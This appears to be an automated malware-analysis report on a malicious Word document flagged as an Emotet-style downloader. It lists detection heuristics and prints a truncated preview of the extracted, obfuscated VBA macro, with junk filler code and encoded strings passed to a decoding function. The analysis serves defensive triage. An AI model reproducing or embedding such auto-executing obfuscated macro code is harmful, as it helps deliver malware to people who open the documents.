Verdict: MALICIOUS
Risk Score: 244

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic; T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro that calls CreateObject. Heuristics also flag a legacy WordBasic auto-exec marker and an Excel 4.0 macro sheet. ClamAV identifies it as Doc.Malware.Emodldr-10025032-0, suggesting it acts as a downloader for a second-stage payload.
Heuristics (9)

- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 58983 bytes |

SHA-256: cef7ed3e7cd7dd15880f3b104a26adb957c8d037d4773e7f39741e5f8f2464a3

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 18 long base64-like blobs)
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "lwOUqUE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "zWJHKDd"
Function btjhYladNwftoG()
On Error Resume Next
Select Case BEmKk
Case 84877
ZYwudG = CStr(pshnH + CStr(24138) - nbMwXE * 75465)
Case 33704
MprCLD = BtaWE
BmHAo = Tan(41169 * vmvMaN)
End Select
TFSjAYa = OmVKU("Y3u5d0ADUAMgBhADMANABkADgAZABmADIAYQA3AGUANQBhADUAMAA4ADgANQA0ADEAZQAyAGIANQAyAGMAMwdS", 6, 79)
Select Case aOMnnH
Case 85265
FmDDmZ = CStr(uhpjda + CStr(49802) - XQRklZ * 88134)
Case 59987
zZsnjm = wSPjUw
iHOsOW = Tan(87093 * DAZpWV)
End Select
Select Case CACLs
Case 49490
ijIdXb = CStr(aWoPbo + CStr(62977) - qJpWwY * 68159)
Case 65862
Itarkd = FTCKF
sGSiZ = Tan(72502 * riJfQK)
End Select
aUllF = OmVKU("dCG6SgAZgBlADUAZQBiADEAZQBiAa%5B", 6, 23)
Select Case WWbPvB
Case 19288
iAnqt = CStr(JImVf + CStr(37421) - jETzz * 94632)
Case 14513
juaZkw = smPEMX
RqjrRh = Tan(42577 * Jlrbn)
End Select
Select Case MZczwX
Case 69299
Bohiz = CStr(inGUa + CStr(52948) - zzpFkh * 71907)
Case 95159
uPknVG = iEUoI
totkbf = Tan(42677 * IOzOP)
End Select
itRaOOiwCWu = OmVKU("wjQAwADMANgAyADIAMABiADIAYgBjAGYAZABhAGIANQA2AGUAOQAzAGQANgA2ADAAMAAxAGMAMQA0ADEANAA4ADMAMwA1ADEAZABjADMANQAyADcAMABkAGEAMwA4ADUAMAA1ADgAMgBjADAAMAAyADgANQBiol6kNm", 3, 155)
Select Case ntMqw
Case 42290
uSuJEX = CStr(cQGnZP + CStr(11077) - MzFFb * 3322)
Case 72211
kZFhO = rdpmGz
zaWHl = Tan(93358 * IMpATm)
End Select
Select Case YWiKh
Case 53006
ZNJfO = CStr(ThorCn + CStr(23619) - jFofnU * 31378)
Case 47129
OJOwjw = qNcUp
bVida = Tan(13466 * szGQn)
End Select
ZnoNSUFuYZ = OmVKU("uMAOQA3ADUAFAXFJ", 2, 10)
Select Case RuftHj
Case 2694
uWAAk = CStr(hApKsm + CStr(41081) - SBJtJS * 6228)
Case 32321
wLrhN = TVknt
zddqXY = Tan(84455 * vYAWn)
End Select
Select Case tvvmwr
Case 10867
pIVAJ = CStr(YDcaf + CStr(95473) - PcjUw * 21774)
Case 47863
UuAZS = zuVJM
ZzuAL = Tan(37054 * zEGhH)
End Select
RkkEYL = OmVKU("6o,MAOQA4AGYAZgA0ADIAYwAzAGIAYgBjADEAMQBhAGQAOAA3ADcAYQBmADgAMABjAGEAYwAQ4DdjO", 4, 69)
Select Case ddTPSz
Case 61809
BVOUbq = CStr(ZJHQS + CStr(86275) - QifIfr * 48469)
Case 18314
Mtqpi = iDMjYX
fjkcTa = Tan(89135 * QoqiNk)
End Select
Select Case uZaaR
Case 317
lCiwq = CStr(IHiaH + CStr(5137) - ZiOirj * 57405)
Case 70498
HRTLJ = LoqqcY
TGwPk = Tan(54270 * hUwol)
End Select
rXfOcNS = OmVKU("d1jAGYAZgBlADMAMgA4AGIAYQA0ADUAZABhAGUAYwA0ADYANgA4ADkAYwA1ADUAMwBmADQAZgBkADgAYQBlADEAMgAwADcAZQAwADQAZgBkADIAYgA0AGQAYwBmADUANwBjAGIAMQA5AGMAYgBlADkANgAzADAAOABlADNNA40", 3, 163)
Select Case LKsjiW
Case 67009
vMdfDS = CStr(pkRZFF + CStr(28987) - mczBh * 36952)
Case 73763
iZKfB = GIGpjX
TkjKGr = Tan(70509 * OftwDG)
End Select
Select Case LzMfUP
Case 54209
TTfvdI = CStr(jIIOb + CStr(11571) - lUMSOz * 56981)
Case 71745
nRbdp = kJKNN
Offboz = Tan(88122 * YMdXML)
End Select
zjuSJi = OmVKU("90jgA1ADIAMABlADQAYwA4ADMAOABiADUAMAAwADIANAAyADcA6KnYX", 4, 47)
Select Case TBAfQi
Case 10623
dBiNhX = CStr(DNsQXp + CStr(61951) - ZzjIpb * 77539)
Case 7187
dKRHK = wAJnCa
lMEZI = Tan(30349 * woCnLa)
End Select
Select Case SKjFjD
Case 76071
mNIUBZ = CStr(GFuZwC + CStr(6520) - dWkHH * 8516)
Case 86553
UtGsK = QPudkG
FHuiwZ = Tan(65938 * FTlPC)
End Select
hJwwU = OmVKU("XVhANwBlAGEAOAA2ADkAOQBkAGEANwAwADkANQBkA
```

... (truncated)